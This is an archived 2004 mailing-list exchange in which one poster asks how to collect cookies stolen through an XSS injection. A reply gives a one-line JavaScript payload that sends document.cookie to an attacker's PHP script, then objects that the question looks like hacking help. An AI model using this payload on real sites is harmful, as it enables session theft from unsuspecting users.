Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | RE: xss php cookie-stealing code |
|---|---|
| Date: | Tue, 28 Sep 2004 09:10:35 +0400 |
Hello, And what do you write in your javascript? If smth. like this: window.location = 'http://mysite/myphp.php?cookie=' + document.cookie; Then your cookie will be stored in the Query_string, in 'cookie' variable... So, the cookie is stored where you stored it... -- And I think this is not a good list for asking such questions. This looks like asking for assiatance in hacking, not in security. -- Best regards, Vladimir Poddubnyy
-----Original Message----- From: Abdel Wahab [mailto:abdelwahab@gmail.com] Sent: Monday, September 27, 2004 5:33 PM To: webappsec@securityfocus.com Subject: xss php cookie-stealing code hello people , i want the simplest php code that stores cookies in a file or send it by email , when i redirect the cookie vars to that script through out an xss java script injecting vulnerabilities.. i code some php , my problem , is what is the variable which the cookies value stored in ??
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | RE: Securing file access, Booth, Simon |
|---|---|
| Next by Date: | RE: Securing file access, Shields, Larry |
| Previous by Thread: | Re: xss php cookie-stealing code, Daniel Souza |
| Next by Thread: | Automatec scanners... (open source), No Reply |
| Indexes: | [Date] [Thread] [Top] [All Lists] |